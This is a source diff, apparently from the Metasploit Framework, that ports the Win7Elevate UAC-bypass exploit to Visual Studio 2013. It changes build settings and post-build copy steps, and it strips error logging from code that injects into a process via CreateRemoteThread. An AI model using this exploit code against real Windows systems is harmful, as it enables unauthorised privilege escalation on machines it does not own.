+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
    <GenerateManifest>false</GenerateManifest>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
  </PropertyGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <ClCompile>
@@ -90,6 +99,8 @@
      <WarningLevel>Level3</WarningLevel>
      <Optimization>Disabled</Optimization>
      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>false</MinimalRebuild>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
@@ -99,6 +110,10 @@
      <Path>
      </Path>
    </BuildLog>
+    <PostBuildEvent>
+      <Command>
+      </Command>
+    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <ClCompile>
@@ -106,11 +121,17 @@
      <WarningLevel>Level3</WarningLevel>
      <Optimization>Disabled</Optimization>
      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>false</MinimalRebuild>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
+    <PostBuildEvent>
+      <Command>
+      </Command>
+    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <ClCompile>
@@ -121,6 +142,7 @@
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
@@ -132,6 +154,10 @@
      <Path>
      </Path>
    </BuildLog>
+    <PostBuildEvent>
+      <Command>
+      </Command>
+    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <ClCompile>
@@ -142,6 +168,7 @@
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
@@ -153,6 +180,10 @@
      <Path>
      </Path>
    </BuildLog>
+    <PostBuildEvent>
+      <Command>
+      </Command>
+    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemGroup>
    <ClInclude Include="stdafx.h" />
@@ -1,6 +1,8 @@

-Microsoft Visual Studio Solution File, Format Version 11.00
-# Visual Studio 2010
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
 Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
 	ProjectSection(SolutionItems) = preProject
 		Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
@@ -18,37 +20,32 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7Elevate", "Win7Elevate\
 EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Pocket PC 2003 (ARMV4) = Debug|Pocket PC 2003 (ARMV4)
 		Debug|Win32 = Debug|Win32
 		Debug|x64 = Debug|x64
-		Release|Pocket PC 2003 (ARMV4) = Release|Pocket PC 2003 (ARMV4)
 		Release|Win32 = Release|Win32
 		Release|x64 = Release|x64
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
 		{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
 		{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
 		{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
-		{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
+		{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.Build.0 = Debug|x64
 		{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
 		{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
 		{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
 		{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
-		{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
 		{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
 		{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
 		{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
-		{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
+		{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.Build.0 = Debug|x64
 		{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
 		{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
 		{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
 		{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
-		{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
 		{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
 		{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
 		{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
-		{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
+		{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.Build.0 = Debug|x64
 		{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
 		{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
 		{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64
@@ -61,22 +61,23 @@ END

 #ifdef _DEBUG

+// Z:\code\metasploit-framework\external\source\exploits\bypassuac\TIOR\Debug\Win32
 #ifdef _WIN64
-IDD_EMBEDDED_DLL        BINARY  MOVEABLE PURE   "..\\x64\\Debug\\Win7ElevateDll64.dll"
-IDD_EMBEDDED_TIOR        BINARY  MOVEABLE PURE   "..\\x64\\Debug\\TIOR64.exe"
+IDD_EMBEDDED_DLL        BINARY  MOVEABLE PURE   "..\\Win7ElevateDll\\\Debug\\x64\\Win7ElevateDll.x64.dll"
+IDD_EMBEDDED_TIOR        BINARY  MOVEABLE PURE   "..\\TIOR\\Debug\\x64\\TIOR.x64.exe"
 #else
-IDD_EMBEDDED_DLL        BINARY  MOVEABLE PURE   "..\\Win32\\Debug\\Win7ElevateDll32.dll"
-IDD_EMBEDDED_TIOR        BINARY  MOVEABLE PURE   "..\\Win32\\Debug\\TIOR32.exe"
+IDD_EMBEDDED_DLL        BINARY  MOVEABLE PURE   "..\\Win7ElevateDll\\\Debug\\Win32\\Win7ElevateDll.x86.dll"
+IDD_EMBEDDED_TIOR        BINARY  MOVEABLE PURE   "..\\TIOR\\Debug\\Win32\\TIOR.x86.exe"
 #endif

 #else // _DEBUG

 #ifdef _WIN64
-IDD_EMBEDDED_DLL        BINARY  MOVEABLE PURE   "..\\x64\\Release\\Win7ElevateDll64.dll"
-IDD_EMBEDDED_TIOR        BINARY  MOVEABLE PURE   "..\\x64\\Release\\TIOR64.exe"
+IDD_EMBEDDED_DLL        BINARY  MOVEABLE PURE   "..\\Win7ElevateDll\\\Release\\x64\\Win7ElevateDll.x64.dll"
+IDD_EMBEDDED_TIOR        BINARY  MOVEABLE PURE   "..\\TIOR\\Release\\x64\\TIOR.x64.exe"
 #else
-IDD_EMBEDDED_DLL        BINARY  MOVEABLE PURE   "..\\Win32\\Release\\Win7ElevateDll32.dll"
-IDD_EMBEDDED_TIOR        BINARY  MOVEABLE PURE   "..\\Win32\\Release\\TIOR32.exe"
+IDD_EMBEDDED_DLL        BINARY  MOVEABLE PURE   "..\\Win7ElevateDll\\\Release\\Win32\\Win7ElevateDll.x86.dll"
+IDD_EMBEDDED_TIOR        BINARY  MOVEABLE PURE   "..\\TIOR\\Release\\Win32\\TIOR.x86.exe"
 #endif

 #endif
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup Label="ProjectConfigurations">
    <ProjectConfiguration Include="Debug|Win32">
      <Configuration>Debug</Configuration>
@@ -28,23 +28,27 @@
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
  <ImportGroup Label="ExtensionSettings">
@@ -63,25 +67,30 @@
  </ImportGroup>
  <PropertyGroup Label="UserMacros" />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <TargetName>$(ProjectName)32</TargetName>
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <TargetName>$(ProjectName)64</TargetName>
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <TargetName>$(ProjectName)32</TargetName>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
    <GenerateManifest>false</GenerateManifest>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <TargetName>$(ProjectName)64</TargetName>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
  </PropertyGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <ClCompile>
@@ -96,10 +105,12 @@
      <FunctionLevelLinking>false</FunctionLevelLinking>
      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
    </Link>
    <BuildLog>
      <Path>
@@ -119,10 +130,12 @@
      <FunctionLevelLinking>false</FunctionLevelLinking>
      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
    </Link>
    <BuildLog>
      <Path>
@@ -141,12 +154,14 @@
      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
      <BufferSecurityCheck>false</BufferSecurityCheck>
      <WholeProgramOptimization>false</WholeProgramOptimization>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>false</GenerateDebugInformation>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
+      <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
    </Link>
    <BuildLog>
      <Path>
@@ -155,6 +170,9 @@
    <ResourceCompile>
      <PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
    </ResourceCompile>
+    <PostBuildEvent>
+      <Command>copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\..\..\..\data\post\bypassuac-$(PlatformTarget).exe"</Command>
+    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <ClCompile>
@@ -168,12 +186,14 @@
      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
      <BufferSecurityCheck>false</BufferSecurityCheck>
      <WholeProgramOptimization>false</WholeProgramOptimization>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>false</GenerateDebugInformation>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
+      <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
    </Link>
    <BuildLog>
      <Path>
@@ -182,6 +202,9 @@
    <ResourceCompile>
      <PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
    </ResourceCompile>
+    <PostBuildEvent>
+      <Command>copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\..\..\..\data\post\bypassuac-$(PlatformTarget).exe"</Command>
+    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemGroup>
    <ClInclude Include="Resource.h" />
@@ -204,7 +227,10 @@
    <ClCompile Include="Win7Elevate_Utils.cpp" />
  </ItemGroup>
  <ItemGroup>
-    <ResourceCompile Include="Win7Elevate.rc" />
+    <ResourceCompile Include="Win7Elevate.rc">
+      <PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">WIN64;_WIN64;_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ResourceCompile>
  </ItemGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
  <ImportGroup Label="ExtensionTargets">
@@ -209,7 +209,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 	if (codeStartAdr >= codeEndAdr)
 	{
 		//MessageBox(hWnd, L"Unexpected function layout", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-		CLogger::LogLine(L"Unexpected function layout");
 		return;
 	}

@@ -220,7 +219,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 	if (dwGMFNRes == 0 || dwGMFNRes >= _countof(szPathToSelf))
 	{
 		//MessageBox(hWnd, L"Couldn't get path to self", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-		CLogger::LogLine(L"Couldn't get path to self");
 		return;
 	}

@@ -231,7 +229,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 	if (S_OK != hr)
 	{
 		//MessageBox(hWnd, L"SHGetFolderPath failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-		CLogger::LogLine(L"SHGetFolderPath failed");
 		return;
 	}

@@ -240,7 +237,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 	if (hModKernel32 == 0)
 	{
 		//MessageBox(hWnd, L"Couldn't load kernel32.dll", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-		CLogger::LogLine(L"Couldn't load kernel32.dll");
 		return;
 	}	

@@ -257,7 +253,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 	||	0 == tfpWaitForSingleObject.f)
 	{
 		//MessageBox(hWnd, L"Couldn't find API", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-		CLogger::LogLine(L"Couldn't find API");
 	}
 	else
 	{
@@ -374,26 +369,11 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d

 				void *pRemoteFunc = reme.AllocAndCopyMemory( RemoteCodeFunc, codeEndAdr - codeStartAdr, true);

-				if (reme.AnyFailures())
-				{
-					//MessageBox(hWnd, L"Remote allocation failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-					CLogger::LogLine(L"Remote allocation failed");
-				}
-				else
+				if (!(reme.AnyFailures()))
 				{
 					HANDLE hRemoteThread = CreateRemoteThread(hTargetProc, NULL, 0, reinterpret_cast< LPTHREAD_START_ROUTINE >( pRemoteFunc ), pRemoteArgs, 0, NULL);

-					if (hRemoteThread == 0)
-					{
-						//MessageBox(hWnd, L"Couldn't create remote thread", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-						CLogger::LogLine(
-							CError::Format( 
-								GetLastError(),
-								L"Couldn't create remote thread", 
-								L"CreateRemoteThread"));
-
-					}
-					else
+					if (hRemoteThread != 0)
 					{
 						if ( Redirector )
 							Redirector();
@@ -415,7 +395,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 							//else if (IDCANCEL == MessageBox(hWnd, L"Continue waiting for remote thread to complete?", L"Win7Elevate", MB_OKCANCEL | MB_ICONQUESTION))
 							else
 							{
-								CLogger::LogLine(L"Continue waiting for remote thread to complete? : NO");
 								// See if it completed before the user asked to stop waiting.
 								// Code that wasn't just a proof-of-concept would use a worker thread that could cancel the wait UI.
 								if (WAIT_OBJECT_0 == WaitForSingleObject(hRemoteThread, 0))
@@ -442,14 +421,4 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d

 	FreeLibrary(hModKernel32);

-	if (bThreadWaitFailure)
-	{
-		//MessageBox(hWnd, L"Error waiting on the remote thread to complete", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-		CLogger::LogLine(L"Error waiting on the remote thread to complete");
-	}
-	else if (bThreadWaitSuccess)
-	{
-		//MessageBox(hWnd, L"Remote thread completed", L"Win7Elevate", MB_OK | MB_ICONINFORMATION);
-		CLogger::LogLine(L"Remote thread completed");
-	}
 }
@@ -33,7 +33,6 @@ bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapPro
 	if (hSnapshot == INVALID_HANDLE_VALUE)
 	{
 		//MessageBox(hWnd, L"CreateToolhelp32Snapshot failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-		CLogger::LogLine(L"CreateToolhelp32Snapshot failed");
 	}
 	else
 	{
@@ -61,17 +60,7 @@ bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapPro
 			{
 				DWORD dwErr = GetLastError();

-				if (ERROR_NO_MORE_FILES != dwErr)
-				{
-					//MessageBox(hWnd, L"Process32Next/First failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-					CLogger::LogLine(L"Process32Next/First failed");
-				}
-				else if (mapProcs.empty())
-				{
-					//MessageBox(hWnd, L"Process32Next/First returned nothing", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-					CLogger::LogLine(L"Process32Next/First returned nothing");
-				}
-				else
+				if ((ERROR_NO_MORE_FILES == dwErr) && !(mapProcs.empty()))
 				{
 					bResult = true;
 				}
@@ -107,7 +96,6 @@ bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPi
 	if (szProcName == NULL)
 	{
 		//MessageBox(hWnd, L"No process name passed in", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-		CLogger::LogLine(L"No process name passed in");
 		return false;
 	}

@@ -140,7 +128,7 @@ bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPi
 		}

 		//MessageBox(hWnd, strMsg.c_str(), L"Win7Elevate", MB_OK | MB_ICONWARNING);
-		CLogger::LogLine(strMsg);
+

 		return false;
 	}
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup Label="ProjectConfigurations">
    <ProjectConfiguration Include="Debug|Win32">
      <Configuration>Debug</Configuration>
@@ -28,23 +28,27 @@
    <ConfigurationType>DynamicLibrary</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
    <ConfigurationType>DynamicLibrary</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
    <ConfigurationType>DynamicLibrary</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
    <ConfigurationType>DynamicLibrary</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
  <ImportGroup Label="ExtensionSettings">
@@ -64,25 +68,30 @@
  <PropertyGroup Label="UserMacros" />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <LinkIncremental>true</LinkIncremental>
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <TargetName>$(ProjectName)32</TargetName>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <LinkIncremental>true</LinkIncremental>
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <TargetName>$(ProjectName)64</TargetName>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <TargetName>$(ProjectName)32</TargetName>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
    <GenerateManifest>false</GenerateManifest>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <TargetName>$(ProjectName)64</TargetName>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
    <GenerateManifest>false</GenerateManifest>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
  </PropertyGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <ClCompile>
@@ -90,11 +99,16 @@
      <WarningLevel>Level3</WarningLevel>
      <Optimization>Disabled</Optimization>
      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <MinimalRebuild>false</MinimalRebuild>
    </ClCompile>
    <Link>
      <SubSystem>Windows</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
+    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <ClCompile>
@@ -102,11 +116,16 @@
      <WarningLevel>Level3</WarningLevel>
      <Optimization>Disabled</Optimization>
      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <MinimalRebuild>false</MinimalRebuild>
    </ClCompile>
    <Link>
      <SubSystem>Windows</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.2 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
+    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <ClCompile>
@@ -117,6 +136,7 @@
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
